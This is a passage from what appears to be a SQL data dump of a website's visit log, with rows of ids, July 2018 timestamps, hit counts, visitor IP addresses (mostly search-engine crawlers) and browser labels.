36.149.53','other'),(271303,1531280163,1,1,0,0,'66.249.69.187','chrome'),(271304,1531280363,1,1,0,0,'54.36.148.209','other'),(271305,1531280784,1,1,0,0,'54.36.148.88','other'),(271306,1531280922,1,1,0,0,'54.36.148.50','other'),(271307,1531281020,1,1,0,0,'54.36.148.255','other'),(271308,1531281345,1,1,0,0,'54.36.148.152','other'),(271309,1531281367,1,1,0,0,'54.36.148.182','other'),(271310,1531281612,1,1,0,0,'54.36.148.241','other'),(271311,1531281646,1,1,0,0,'54.36.149.59','other'),(271312,1531281828,1,1,0,0,'54.36.148.228','other'),(271313,1531282102,1,1,0,0,'54.36.148.116','other'),(271314,1531282104,1,1,0,0,'54.36.148.166','other'),(271315,1531282266,1,1,0,0,'54.36.148.66','other'),(271316,1531282481,1,1,0,0,'37.9.113.60','other'),(271317,1531282588,1,1,0,0,'54.36.148.30','other'),(271318,1531282892,1,1,0,0,'54.36.148.26','other'),(271319,1531282983,1,1,0,0,'54.36.148.99','other'),(271320,1531283003,1,1,0,0,'8.29.198.26','other'),(271321,1531283155,1,1,0,0,'95.163.255.95','other'),(271322,1531283236,1,0,1,0,'66.249.69.230',''),(271323,1531283317,1,1,0,0,'54.36.148.145','other'),(271324,1531283343,1,1,0,0,'54.36.148.190','other'),(271325,1531283399,1,1,0,0,'54.36.149.63','other'),(271326,1531283570,1,1,0,0,'213.180.203.40','other'),(271327,1531283760,1,1,0,0,'54.36.148.78','other'),(271328,1531283969,1,1,0,0,'54.36.148.159','other'),(271329,1531284224,1,1,0,0,'54.36.148.162','other'),(271330,1531284328,2,2,0,0,'95.213.141.126','opera'),(271331,1531284462,1,1,0,0,'54.36.149.29','other'),(271332,1531284827,1,1,0,0,'54.36.148.165','other'),(271333,1531285003,1,1,0,0,'54.36.148.93','other'),(271334,1531285172,1,1,0,0,'54.36.148.16','other'),(271335,1531285194,1,1,0,0,'54.36.149.13','other'),(271336,1531285299,1,1,0,0,'54.36.148.92','other'),(271337,1531285369,1,1,0,0,'141.8.142.74','other'),(271338,1531285434,1,1,0,0,'54.36.148.81','other'),(271339,1531285581,1,1,0,0,'95.163.255.115','other'),(271340,1531285725,1,1,0,0,'54.36.149.68','other'),(271341,1531286294,1,1,0,0,'54.36.148.139','other'),(271342,1531286409,1,1,0,0,'37.55.158.118','chrome'),(271343,1531286437,1,1,0,0,'54.36.149.25','other'),(271344,1531286493,1,1,0,0,'54.36.148.247','other'),(271345,1531286845,1,1,0,0,'66.249.69.230','chrome'),(271346,1531286850,1,1,0,0,'54.36.148.85','other'),(271347,1531286869,1,1,0,0,'54.36.149.43','other'),(271348,1531286906,3,3,0,0,'216.244.66.241','other'),(271349,1531287013,1,1,0,0,'54.36.148.218','other'),(271350,1531287098,1,1,0,0,'54.36.149.59','other'),(271351,1531287158,1,0,1,0,'66.249.69.228',''),(271352,1531287625,1,1,0,0,'54.36.149.27','other'),(271353,1531287643,1,1,0,0,'54.36.149.1','other'),(271354,1531287982,1,1,0,0,'216.244.66.241','other'),(271355,1531288130,1,1,0,0,'54.36.148.75','other'),(271356,1531288140,1,1,0,0,'54.36.148.238','other'),(271357,1531288489,1,1,0,0,'66.249.69.187','chrome'),(271358,1531288522,1,1,0,0,'54.36.148.233','other'),(271359,1531288575,1,1,0,0,'54.36.149.25','other'),(271360,1531288662,1,1,0,0,'54.36.148.106','other'),(271361,1531288740,1,1,0,0,'91.196.177.15','chrome'),(271362,1531288962,1,1,0,0,'54.36.148.163','other'),(271363,1531288980,1,1,0,0,'54.36.149.53','other'),(271364,1531289083,1,1,0,0,'54.36.148.73','other'),(271365,1531289132,1,1,0,0,'54.36.149.11','other'),(271366,1531289398,1,1,0,0,'91.209.11.236','other'),(271367,1531289608,1,0,1,0,'66.249.69.228',''),(271368,1531289762,1,1,0,0,'54.36.148.85','other'),(271369,1531289863,1,1,0,0,'8.29.198.27','other'),(271370,1531290100,1,1,0,0,'54.36.148.224','other'),(271371,1531290121,1,1,0,0,'54.36.149.8','other'),(271372,1531290312,2,2,0,0,'216.244.66.241','other'),(271373,1531290345,1,1,0,0,'54.36.148.249','other'),(271374,1531290463,1,1,0,0,'54.36.148.206','other'),(271375,1531290475,1,1,0,0,'141.8.142.74','other'),(271376,1531290824,1,1,0,0,'54.36.148.207','other'),(271377,1531291093,1,1,0,0,'54.36.148.84','other'),(271378,1531291142,1,1,0,0,'54.36.148.46','other'),(271379,1531291432,1,1,0,0,'141.8.142.74','other'),(271380,1531291517,1,1,0,0,'54.36.149.45','other'),(271381,1531291524,2,2,0,0,'54.36.148.80','other'),(271382,1531291691,1,1,0,0,'54.36.148.105','other'),(271383,1531291882,1,0,1,0,'66.249.69.230',''),(271384,1531292019,1,1,0,0,'54.36.148.59','other'),(271385,1531292023,1,1,0,0,'54.36.148.98','other'),(271386,1531292099,2,2,0,0,'216.244.66.241','other'),(271387,1531292115,1,0,1,0,'66.249.69.232',''),(271388,1531292180,1,1,0,0,'54.36.148.136','other'),(271389,1531292207,1,1,0,0,'54.36.148.139','other'),(271390,1531292645,1,1,0,0,'54.36.149.90','other'),(271391,1531292835,1,1,0,0,'54.36.148.160','other'),(271392,1531293017,1,1,0,0,'54.36.148.56','other'),(271393,1531293280,1,1,0,0,'54.36.149.42','other'),(271394,1531293312,1,1,0,0,'54.36.148.139','other'),(271395,1531293353,1,1,0,0,'216.244.66.241','other'),(271396,1531293402,1,1,0,0,'91.196.178.175','chrome'),(271397,1531293420,1,1,0,0,'54.36.149.43','other'),(271398,1531293422,1,1,0,0,'54.36.148.209','other'),(271399,1531293743,1,1,0,0,'54.36.148.68','other'),(271400,1531293757,1,1,0,0,'54.36.148.80','other'),(271401,1531293808,1,1,0,0,'54.36.148.205','other'),(271402,1531293836,1,1,0,0,'8.29.198.26','other'),(271403,1531293871,1,1,0,0,'54.36.148.128','other'),(271404,1531294089,1,1,0,0,'54.36.148.118','other'),(271405,1531294104,1,1,0,0,'54.36.149.66','other'),(271406,1531294255,1,1,0,0,'54.36.148.166','other'),(271407,1531294539,1,0,1,0,'66.249.69.230',''),(271408,1531294691,1,1,0,0,'54.36.148.173','other'),(271409,1531294698,1,1,0,0,'54.36.149.6','other'),(271410,1531294746,2,2,0,0,'91.196.178.66','chrome'),(271411,1531294756,1,1,0,0,'54.36.149.51','other'),(271412,1531294814,1,1,0,0,'66.249.69.187','chrome'),(271413,1531294817,1,1,0,0,'216.244.66.241','other'),(271414,1531295078,1,1,0,0,'54.36.148.224','other'),(271415,1531295333,1,1,0,0,'54.36.149.88','other'),(271416,1531295362,1,1,0,0,'95.163.255.112','other'),(271417,1531295375,1,1,0,0,'95.163.255.113','other'),(271418,1531295393,1,1,0,0,'95.163.255.102','other'),(271419,1531295472,1,1,0,0,'54.36.148.234','other'),(271420,1531295600,1,1,0,0,'178.95.66.69','chrome'),(271421,1531295942,2,2,0,0,'89.202.46.158','chrome'),(271422,1531296172,1,1,0,0,'54.36.149.43','other'),(271423,1531296199,2,2,0,0,'130.180.217.237','chrome'),(271424,1531296994,2,2,0,0,'91.196.178.85','firefox'),(271425,1531297008,1,1,0,0,'54.36.148.60','other'),(271426,1531297099,1,0,1,0,'66.249.69.232',''),(271427,1531297307,1,1,0,0,'54.36.148.167','other'),(271428,1531297386,2,2,0,0,'54.36.148.57','other'),(271429,1531297425,1,1,0,0,'54.36.148.39','other'),(271430,1531297570,1,1,0,0,'141.8.142.74','other'),(271431,1531297792,1,1,0,0,'54.36.148.159','other'),(271432,1531298158,1,1,0,0,'54.36.148.213','other'),(271433,1531298192,1,1,0,0,'54.36.149.98','other'),(271434,1531298204,1,1,0,0,'54.36.149.4','other'),(271435,1531298308,1,1,0,0,'54.36.149.3','other'),(271436,1531298325,1,1,0,0,'54.36.148.20','other'),(271437,1531298379,2,2,0,0,'95.132.4.70','chrome'),(271438,1531298415,2,2,0,0,'46.201.189.183','firefox'),(271439,1531298742,1,1,0,0,'54.36.148.201','other'),(271440,1531298779,1,1,0,0,'54.36.149.0','other'),(271441,1531298847,1,1,0,0,'91.196.178.68','chrome'),(271442,1531298851,2,0,2,0,'66.249.69.228',''),(271443,1531299120,1,1,0,0,'54.36.148.43','other'),(271444,1531299226,1,1,0,0,'54.36.148.128','other'),(271445,1531299416,1,1,0,0,'54.36.148.15','other'),(271446,1531299457,1,1,0,0,'54.36.148.182','other'),(271447,1531299470,2,2,0,0,'216.244.66.241','other'),(271448,1531299489,1,1,0,0,'54.36.148.176','other'),(271449,1531300135,1,1,0,0,'66.249.69.185','chrome'),(271450,1531300376,1,1,0,0,'54.36.148.191','other'),(271451,1531300417,1,1,0,0,'54.36.149.41','other'),(271452,1531300452,1,1,0,0,'54.36.148.250','other'),(271453,1531300568,1,1,0,0,'216.244.66.241','other'),(271454,1531300722,1,1,0,0,'8.29.198.27','other'),(271455,1531300810,14,14,0,0,'157.55.39.100','other'),(271456,1531300825,6,6,0,0,'157.55.39.213','other'),(271457,1531300830,1,0,1,0,'66.249.69.189',''),(271458,1531300831,13,13,0,0,'157.55.39.97','other'),(271459,1531301334,1,1,0,0,'78.111.187.238','chrome'),(271460,1531301476,1,1,0,0,'37.55.158.118','chrome'),(271461,1531301608,1,0,1,0,'66.249.69.185',''),(271462,1531301710,1,1,0,0,'37.73.75.42','chrome'),(271463,1531301845,1,1,0,0,'54.36.149.96','other'),(271464,1531302010,1,1,0,0,'54.36.149.38','other'),(271465,1531302011,1,1,0,0,'91.196.178.169','chrome'),(271466,1531302611,1,1,0,0,'54.36.148.138','other'),(271467,1531302733,1,1,0,0,'54.36.148.157','other'),(271468,1531302752,1,0,1,0,'66.249.69.230',''),(271469,1531302797,1,1,0,0,'54.36.149.80','other'),(271470,1531302804,1,1,0,0,'54.36.149.98','other'),(271471,1531303158,1,1,0,0,'54.36.148.187','other'),(271472,1531303259,1,1,0,0,'54.36.148.34','other'),(271473,1531303336,1,1,0,0,'54.36.148.127','other'),(271474,1531303699,1,1,0,0,'54.36.148.118','other'),(271475,1531303746,1,1,0,0,'54.36.148.81','other'),(271476,1531303852,1,1,0,0,'54.36.148.198','other'),(271477,1531303891,1,1,0,0,'54.36.148.74','other'),(271478,1531303921,2,2,0,0,'91.196.178.173','chrome'),(271479,1531303983,1,1,0,0,'54.36.148.208','other'),(271480,1531304009,1,1,0,0,'54.36.149.33','other'),(271481,1531304053,2,2,0,0,'95.132.4.70','chrome'),(271482,1531304089,1,1,0,0,'54.36.148.108','other'),(271483,1531304103,1,1,0,0,'54.36.148.227','other'),(271484,1531304188,1,1,0,0,'54.36.148.156','other'),(271485,1531304347,1,1,0,0,'54.36.148.145','other'),(271486,1531304418,2,0,2,0,'66.249.69.185',''),(271487,1531304455,1,1,0,0,'54.36.148.162','other'),(271488,1531304468,2,1,1,0,'66.249.69.228',''),(271489,1531304553,1,0,1,0,'66.249.69.187',''),(271490,1531304680,1,1,0,0,'8.29.198.25','other'),(271491,1531304758,2,2,0,0,'141.8.142.74','other'),(271492,1531304972,1,1,0,0,'95.132.4.70','chrome'),(271493,1531305085,3,3,0,0,'216.244.66.241','other'),(271494,1531305243,1,1,0,0,'54.36.148.45','other'),(271495,1531305409,1,1,0,0,'95.163.255.175','other'),(271496,1531305432,1,1,0,0,'54.36.149.103','other'),(271497,1531305446,1,1,0,0,'176.117.172.65','chrome'),(271498,1531305556,1,1,0,0,'91.196.178.103','chrome'),(271499,1531305582,1,1,0,0,'54.36.148.204','other'),(271500,1531305623,1,1,0,0,'91.209.11.236','other'),(271501,1531305674,3,3,0,0,'77.109.20.166','chrome'),(271502,1531305679,1,1,0,0,'54.36.148.108','other'),(271503,1531305783,1,1,0,0,'66.249.69.185','chrome'),(271504,1531306124,1,1,0,0,'141.8.142.74','other'),(271505,1531306331,1,1,0,0,'54.36.148.46','other'),(271506,1531306506,1,1,0,0,'54.36.148.165','other'),(271507,1531306566,1,1,0,0,'54.36.149.60','other'),(271508,1531306668,1,1,0,0,'54.36.148.100','other'),(271509,1531307701,1,1,0,0,'54.36.149.107','other'),(271510,1531307785,1,1,0,0,'216.244.66.241','other'),(271511,1531307786,1,1,0,0,'54.36.149.51','other'),(271512,1531307933,2,2,0,0,'130.180.217.237','chrome'),(271513,1531307941,1,1,0,0,'54.36.149.10','other'),(271514,1531308003,1,0,1,0,'66.249.69.189',''),(271515,1531308243,1,0,1,0,'66.249.69.187',''),(271516,1531308497,1,0,1,0,'66.249.69.230',''),(271517,1531308698,1,1,0,0,'54.36.149.24','other'),(271518,1531308765,1,1,0,0,'141.8.142.74','other'),(271519,1531308770,1,1,0,0,'37.55.78.241','chrome'),(271520,1531308828,1,1,0,0,'54.36.148.17','other'),(271521,1531308844,1,1,0,0,'54.36.148.24','other'),(271522,1531309044,1,1,0,0,'54.36.149.101','other'),(271523,1531309094,1,1,0,0,'54.36.148.176','other'),(271524,1531309122,1,1,0,0,'91.196.176.13','chrome'),(271525,1531309399,1,0,1,0,'66.249.69.187',''),(271526,1531309455,1,1,0,0,'54.36.149.11','other'),(271527,1531309477,1,1,0,0,'54.36.149.69','other'),(271528,1531309509,1,1,0,0,'54.36.148.57','other'),(271529,1531309615,1,1,0,0,'54.36.148.67','other'),(271530,1531309730,1,1,0,0,'54.36.148.251','other'),(271531,1531309944,2,2,0,0,'216.244.66.241','other'),(271532,1531310060,1,1,0,0,'54.36.149.0','other'),(271533,1531310089,2,1,1,0,'66.249.69.232',''),(271534,1531310200,1,0,1,0,'66.249.69.185',''),(271535,1531310221,2,2,0,0,'66.249.69.187','chrome'),(271536,1531310590,1,1,0,0,'54.36.148.37','other'),(271537,1531310727,2,2,0,0,'162.210.196.97','other'),(271538,1531310737,1,1,0,0,'54.36.148.207','other'),(271539,1531311111,1,1,0,0,'91.196.178.90','chrome'),(271540,1531311132,1,1,0,0,'54.36.149.46','other'),(271541,1531311540,1,1,0,0,'54.36.149.34','other'),(271542,1531311569,1,1,0,0,'8.29.198.25','other'),(271543,1531311608,1,1,0,0,'54.36.148.85','other'),(271544,1531311653,1,1,0,0,'169.61.157.77','firefox'),(271545,1531311686,1,1,0,0,'95.163.255.98','other'),(271546,1531311903,1,1,0,0,'66.249.69.189','chrome'),(271547,1531312126,1,1,0,0,'54.36.148.176','other'),(271548,1531312130,1,1,0,0,'54.36.148.168','other'),(271549,1531312211,1,1,0,0,'54.36.148.121','other'),(271550,1531312471,1,1,0,0,'54.36.149.103','other'),(271551,1531312606,1,1,0,0,'54.36.148.10','other'),(271552,1531312652,1,1,0,0,'54.36.148.49','other'),(271553,1531312736,1,1,0,0,'54.36.148.243','other'),(271554,1531312738,1,1,0,0,'54.36.149.17','other'),(271555,1531312888,1,1,0,0,'91.196.178.175','chrome'),(271556,1531312897,1,1,0,0,'141.8.142.74','other'),(271557,1531312899,2,0,2,0,'66.249.69.228',''),(271558,1531313167,1,1,0,0,'54.36.148.215','other'),(271559,1531313180,1,1,0,0,'54.36.148.92','other'),(271560,1531313194,2,0,2,0,'66.249.69.189',''),(271561,1531313502,1,1,0,0,'54.36.148.232','other'),(271562,1531313609,1,1,0,0,'54.36.148.93','other'),(271563,1531313694,1,1,0,0,'54.36.148.158','other'),(271564,1531313720,1,1,0,0,'54.36.148.40','other'),(271565,1531313958,1,1,0,0,'54.36.149.12','other'),(271566,1531314016,1,1,0,0,'54.36.148.101','other'),(271567,1531314037,1,1,0,0,'54.36.148.221','other'),(271568,1531314175,1,1,0,0,'216.244.66.241','other'),(271569,1531314208,1,0,1,0,'66.249.69.187',''),(271570,1531314237,1,1,0,0,'54.36.148.166','other'),(271571,1531314305,1,1,0,0,'54.36.148.67','other'),(271572,1531314367,1,1,0,0,'54.36.148.229','other'),(271573,1531314579,1,1,0,0,'54.36.149.75','other'),(271574,1531314759,1,1,0,0,'54.36.148.206','other'),(271575,1531314844,1,1,0,0,'54.36.148.184','other'),(271576,1531315129,2,2,0,0,'91.196.178.172','chrome'),(271577,1531315141,1,1,0,0,'91.196.178.175','chrome'),(271578,1531315299,1,1,0,0,'54.36.148.197','other'),(271579,1531315361,1,1,0,0,'54.36.148.231','other'),(271580,1531315510,1,1,0,0,'8.29.198.26','other'),(271581,1531315677,1,1,0,0,'54.36.148.106','other'),(271582,1531315842,1,1,0,0,'54.36.149.64','other'),(271583,1531315848,1,1,0,0,'54.36.148.160','other'),(271584,1531315888,1,1,0,0,'54.36.149.26','other'),(271585,1531316032,1,1,0,0,'91.196.178.172','chrome'),(271586,1531316133,4,4,0,0,'148.251.69.139','other'),(271587,1531316289,1,1,0,0,'54.36.148.247','other'),(271588,1531316295,1,1,0,0,'54.36.149.95','other'),(271589,1531316464,1,1,0,0,'54.36.148.32','other'),(271590,1531316475,1,1,0,0,'54.36.148.148','other'),(271591,1531316496,1,1,0,0,'54.36.148.112','other'),(271592,1531316577,1,0,1,0,'66.249.69.189',''),(271593,1531316587,1,1,0,0,'37.55.129.191','chrome'),(271594,1531316975,1,1,0,0,'54.36.148.122','other'),(271595,1531316989,1,1,0,0,'54.36.148.55','other'),(271596,1531317015,1,1,0,0,'54.36.148.127','other'),(271597,1531317018,1,1,0,0,'54.36.149.86','other'),(271598,1531317068,1,1,0,0,'54.36.149.51','other'),(271599,1531317468,1,1,0,0,'54.36.149.97','other'),(271600,1531317484,1,1,0,0,'54.36.149.40','other'),(271601,1531317553,1,1,0,0,'54.36.149.43','other'),(271602,1531317725,1,1,0,0,'91.124.182.170','firefox'),(271603,1531317889,1,1,0,0,'54.36.148.48','other'),(271604,1531318056,3,3,0,0,'91.196.178.169','chrome'),(271605,1531318360,2,2,0,0,'31.134.120.103','chrome'),(271606,1531318367,1,0,1,0,'66.249.69.228',''),(271607,1531318376,2,2,0,0,'141.8.142.74','other'),(271608,1531318377,1,1,0,0,'54.36.148.240','other'),(271609,1531318528,1,1,0,0,'54.36.148.96','other'),(271610,1531318529,1,1,0,0,'87.250.224.96','other'),(271611,1531318591,1,1,0,0,'95.132.6.168','chrome'),(271612,1531318669,1,1,0,0,'54.36.148.190','other'),(271613,1531318699,1,1,0,0,'216.244.66.241','other'),(271614,1531318879,1,1,0,0,'54.36.148.72','other'),(271615,1531318994,1,1,0,0,'54.36.148.100','other'),(271616,1531319165,1,0,1,0,'66.249.69.230',''),(271617,1531319613,1,1,0,0,'54.36.149.89','other'),(271618,1531319879,1,1,0,0,'31.41.71.207','chrome'),(271619,1531320113,1,1,0,0,'54.36.148.60','other'),(271620,1531320323,1,1,0,0,'54.36.148.58','other'),(271621,1531320392,1,1,0,0,'54.36.148.122','other'),(271622,1531320430,1,1,0,0,'54.36.149.86','other'),(271623,1531320438,1,1,0,0,'91.196.178.82','firefox'),(271624,1531320545,1,1,0,0,'46.174.126.67','firefox'),(271625,1531320726,1,1,0,0,'54.36.149.56','other'),(271626,1531321049,1,1,0,0,'216.244.66.241','other'),(271627,1531321297,1,1,0,0,'54.36.148.36','other'),(271628,1531321352,1,1,0,0,'54.36.148.82','other'),(271629,1531321623,1,1,0,0,'54.36.148.191','other'),(271630,1531321733,1,1,0,0,'54.36.149.107','other'),(271631,1531321790,1,1,0,0,'54.36.148.97','other'),(271632,1531322084,1,1,0,0,'54.36.149.29','other'),(271633,1531322102,1,1,0,0,'37.9.113.132','other'),(271634,1531322222,1,1,0,0,'54.36.148.72','other'),(271635,1531322434,1,1,0,0,'8.29.198.26','other'),(271636,1531322540,1,1,0,0,'66.249.69.187','chrome'),(271637,1531322833,1,1,0,0,'69.12.66.200','chrome'),(271638,1531322912,1,1,0,0,'54.36.148.14','other'),(271639,1531323165,1,1,0,0,'54.36.148.50','other'),(271640,1531323245,3,3,0,0,'91.209.51.22','other'),(271641,1531323412,1,1,0,0,'54.36.149.67','other'),(271642,1531323473,1,1,0,0,'54.165.59.7','other'),(271643,1531323669,1,1,0,0,'54.36.148.253','other'),(271644,1531323674,1,1,0,0,'87.250.224.96','other'),(271645,1531323696,1,1,0,0,'216.244.66.241','other'),(271646,1531323788,1,1,0,0,'54.36.148.189','other'),(271647,1531323968,1,1,0,0,'54.36.149.28','other'),(271648,1531324378,1,1,0,0,'188.230.43.254','other'),(271649,1531324425,1,1,0,0,'54.36.148.53','other'),(271650,1531324449,1,1,0,0,'176.120.63.241','chrome'),(271651,1531324642,1,1,0,0,'216.244.66.241','other'),(271652,1531324779,1,1,0,0,'54.36.148.94','other'),(271653,1531324949,1,1,0,0,'54.36.148.108','other'),(271654,1531324967,1,1,0,0,'54.36.148.237','other'),(271655,1531325934,1,1,0,0,'54.36.148.254','other'),(271656,1531325982,1,1,0,0,'54.36.148.228','other'),(271657,1531326002,2,2,0,0,'92.113.189.235','chrome'),(271658,1531326168,1,1,0,0,'213.180.203.40','other'),(271659,1531326289,1,1,0,0,'54.36.148.199','other'),(271660,1531326357,1,1,0,0,'8.29.198.25','other'),(271661,1531326382,1,1,0,0,'54.36.148.160','other'),(271662,1531326568,1,1,0,0,'54.36.148.14','other'),(271663,1531326576,1,1,0,0,'54.36.148.196','other'),(271664,1531326628,1,1,0,0,'54.36.149.66','other'),(271665,1531326630,2,2,0,0,'54.36.149.28','other'),(271666,1531326776,1,1,0,0,'188.230.43.254','other'),(271667,1531326801,1,1,0,0,'54.36.149.12','other'),(271668,1531327122,1,1,0,0,'54.36.149.36','other'),(271669,1531327205,2,2,0,0,'216.244.66.241','other'),(271670,1531327512,1,1,0,0,'54.36.148.144','other'),(271671,1531327573,1,1,0,0,'54.36.149.38','other'),(271672,1531327603,1,1,0,0,'54.36.148.208','other'),(271673,1531327648,1,1,0,0,'54.36.148.232','other'),(271674,1531327816,1,1,0,0,'54.36.149.90','other'),(271675,1531327989,1,1,0,0,'31.223.224.135','firefox'),(271676,1531328132,1,1,0,0,'54.36.149.83','other'),(271677,1531328153,1,1,0,0,'54.165.59.7','other'),(271678,1531328235,1,1,0,0,'54.36.148.96','other'),(271679,1531328404,1,1,0,0,'54.36.148.99','other'),(271680,1531328418,1,1,0,0,'216.244.66.241','other'),(271681,1531328499,1,1,0,0,'54.36.148.54','other'),(271682,1531328504,1,1,0,0,'54.36.148.117','other'),(271683,1531328827,1,0,1,0,'66.249.69.228',''),(271684,1531328930,1,1,0,0,'66.249.69.185','chrome'),(271685,1531329071,1,1,0,0,'54.36.148.27','other'),(271686,1531329177,1,1,0,0,'188.230.43.254','other'),(271687,1531329220,1,1,0,0,'94.231.32.68','chrome'),(271688,1531329307,1,1,0,0,'54.36.148.181','other'),(271689,1531329327,1,1,0,0,'54.36.148.109','other'),(271690,1531329342,1,1,0,0,'91.196.178.129','firefox'),(271691,1531329522,1,1,0,0,'54.36.148.126','other'),(271692,1531329708,1,1,0,0,'54.36.148.242','other'),(271693,1531329746,1,1,0,0,'54.36.148.151','other'),(271694,1531329818,1,1,0,0,'54.36.148.113','other'),(271695,1531330003,1,1,0,0,'54.36.148.239','other'),(271696,1531330042,1,1,0,0,'54.36.149.39','other'),(271697,1531330094,1,1,0,0,'54.36.148.13','other'),(271698,1531330181,1,1,0,0,'54.36.148.237','other'),(271699,1531330314,1,1,0,0,'54.36.148.75','other'),(271700,1531330321,1,1,0,0,'54.36.148.227','other'),(271701,1531330426,18,18,0,0,'172.241.112.83','other'),(271702,1531330568,1,1,0,0,'54.36.148.59','other'),(271703,1531330846,1,1,0,0,'54.36.148.35','other'),(271704,1531330943,1,1,0,0,'87.250.224.85','other'),(271705,1531331017,1,1,0,0,'54.36.149.6','other'),(271706,1531331045,1,1,0,0,'54.36.148.198','other'),(271707,1531331129,1,0,1,0,'66.249.69.228',''),(271708,1531331133,1,1,0,0,'54.36.149.21','other'),(271709,1531331349,1,1,0,0,'54.36.148.193','other'),(271710,1531331391,1,1,0,0,'54.36.148.134','other'),(271711,1531331417,1,1,0,0,'91.196.178.172','chrome'),(271712,1531331571,3,3,0,0,'216.244.66.241','other'),(271713,1531331579,1,1,0,0,'188.230.43.254','other'),(271714,1531331665,1,1,0,0,'93.72.131.1','chrome'),(271715,1531331894,1,1,0,0,'54.165.59.7','other'),(271716,1531332036,1,1,0,0,'54.36.148.248','other'),(271717,1531332140,1,1,0,0,'54.36.148.168','other'),(271718,1531332155,1,1,0,0,'54.36.148.188','other'),(271719,1531332206,1,1,0,0,'54.36.149.52','other'),(271720,1531332419,1,1,0,0,'95.163.255.185','other'),(271721,1531332455,1,1,0,0,'54.36.149.70','other'),(271722,1531332696,1,1,0,0,'54.36.148.65','other'),(271723,1531332857,1,1,0,0,'54.36.148.138','other'),(271724,1531333174,1,1,0,0,'54.36.149.4','other'),(271725,1531333210,1,1,0,0,'54.36.148.229','other'),(271726,1531333288,1,0,1,0,'66.249.69.230',''),(271727,1531333289,1,1,0,0,'8.29.198.27','other'),(271728,1531333460,1,1,0,0,'54.36.148.91','other'),(271729,1531333668,1,1,0,0,'54.36.148.171','other'),(271730,1531333779,1,1,0,0,'54.36.148.149','other'),(271731,1531333954,1,0,1,0,'66.249.69.187',''),(271732,1531334007,1,1,0,0,'54.36.148.36','other'),(271733,1531334040,1,1,0,0,'54.36.149.26','other'),(271734,1531334134,1,1,0,0,'54.36.149.16','other'),(271735,1531334192,1,1,0,0,'66.249.69.185','chrome'),(271736,1531334250,1,1,0,0,'54.36.148.190','other'),(271737,1531334296,1,1,0,0,'54.36.148.69','other'),(271738,1531334401,1,1,0,0,'54.36.148.228','other'),(271739,1531334581,1,1,0,0,'54.36.148.181','other'),(271740,1531334775,1,1,0,0,'54.36.148.117','other'),(271741,1531334989,1,1,0,0,'54.36.148.70','other'),(271742,1531335055,1,1,0,0,'216.244.66.241','other'),(271743,1531335408,1,1,0,0,'54.36.148.149','other'),(271744,1531335506,1,1,0,0,'54.36.148.85','other'),(271745,1531335611,1,1,0,0,'54.36.148.87','other'),(271746,1531335657,1,1,0,0,'54.36.148.236','other'),(271747,1531335716,1,1,0,0,'141.8.142.74','other'),(271748,1531335890,1,1,0,0,'77.222.159.254','chrome'),(271749,1531335905,1,1,0,0,'178.154.171.88','other'),(271750,1531336370,1,1,0,0,'54.36.148.191','other'),(271751,1531336416,1,1,0,0,'91.196.178.82','firefox'),(271752,1531336467,1,1,0,0,'54.36.148.36','other'),(271753,1531336509,1,1,0,0,'157.55.39.100','other'),(271754,1531336611,1,1,0,0,'54.36.148.17','other'),(271755,1531336731,1,1,0,0,'54.36.148.243','other'),(271756,1531336784,1,1,0,0,'54.36.148.204','other'),(271757,1531336876,1,1,0,0,'77.222.159.254','chrome'),(271758,1531337052,1,1,0,0,'216.244.66.241','other'),(271759,1531337058,1,1,0,0,'54.36.148.71','other'),(271760,1531337191,1,1,0,0,'8.29.198.25','other'),(271761,1531337333,1,1,0,0,'54.36.148.89','other'),(271762,1531337368,2,2,0,0,'91.196.178.172','chrome'),(271763,1531337380,1,1,0,0,'54.36.148.125','other'),(271764,1531337456,1,1,0,0,'87.250.224.125','other'),(271765,1531337879,1,1,0,0,'54.36.148.83','other'),(271766,1531337881,1,1,0,0,'54.36.148.237','other'),(271767,1531337900,1,1,0,0,'54.36.149.16','other'),(271768,1531337944,1,1,0,0,'54.36.149.78','other'),(271769,1531338613,1,1,0,0,'54.36.148.206','other'),(271770,1531338832,1,1,0,0,'95.163.255.160','other'),(271771,1531338918,1,1,0,0,'54.36.148.21','other'),(271772,1531339398,1,1,0,0,'54.36.149.87','other'),(271773,1531339704,1,1,0,0,'54.36.148.183','other'),(271774,1531339783,1,1,0,0,'157.55.39.94','other'),(271775,1531340116,1,1,0,0,'54.36.148.185','other'),(271776,1531340138,1,1,0,0,'178.154.200.28','other'),(271777,1531340452,1,1,0,0,'54.36.148.143','other'),(271778,1531340936,1,1,0,0,'54.36.148.223','other'),(271779,1531340966,1,1,0,0,'54.36.148.94','other'),(271780,1531341018,1,1,0,0,'54.36.149.106','other'),(271781,1531341057,1,1,0,0,'54.36.148.195','other'),(271782,1531341226,1,1,0,0,'54.36.148.199','other'),(271783,1531341596,1,1,0,0,'54.36.148.65','other'),(271784,1531341723,1,1,0,0,'54.36.149.25','other'),(271785,1531342167,1,1,0,0,'54.36.149.64','other'),(271786,1531342199,1,1,0,0,'54.36.148.225','other'),(271787,1531342207,1,1,0,0,'54.36.148.176','other'),(271788,1531342533,1,1,0,0,'54.36.149.95','other'),(271789,1531342566,1,1,0,0,'178.154.171.10','other'),(271790,1531342569,1,1,0,0,'178.154.200.73','other'),(271791,1531342597,1,1,0,0,'54.36.148.34','other'),(271792,1531342694,1,1,0,0,'54.36.149.8','other'),(271793,1531342805,1,1,0,0,'216.244.66.241','other'),(271794,1531343427,1,1,0,0,'54.36.148.242','other'),(271795,1531343615,1,1,0,0,'54.36.149.35','other'),(271796,1531343758,1,1,0,0,'54.36.148.64','other'),(271797,1531343858,1,1,0,0,'54.36.149.53','other'),(271798,1531343995,1,1,0,0,'54.36.149.33','other'),(271799,1531344123,1,1,0,0,'54.36.148.120','other'),(271800,1531344148,1,1,0,0,'8.29.198.27','other'),(271801,1531344217,1,1,0,0,'54.36.148.128','other'),(271802,1531344467,1,1,0,0,'54.36.149.70','other'),(271803,1531344840,1,1,0,0,'54.36.148.200','other'),(271804,1531344855,1,1,0,0,'54.36.148.112','other'),(271805,1531345005,1,1,0,0,'54.36.148.125','other'),(271806,1531345024,1,1,0,0,'141.8.142.74','other'),(271807,1531345112,1,1,0,0,'157.55.39.94','other'),(271808,1531345171,1,1,0,0,'54.36.149.31','other'),(271809,1531345215,6,6,0,0,'5.9.61.232','other'),(271810,1531345533,1,1,0,0,'54.36.148.220','other'),(271811,1531345669,1,1,0,0,'54.36.149.83','other'),(271812,1531345854,1,1,0,0,'54.36.148.122','other'),(271813,1531345904,1,1,0,0,'54.36.148.178','other'),(271814,1531345940,1,1,0,0,'54.36.148.77','other'),(271815,1531346522,1,1,0,0,'54.36.148.29','other'),(271816,1531346541,2,2,0,0,'54.165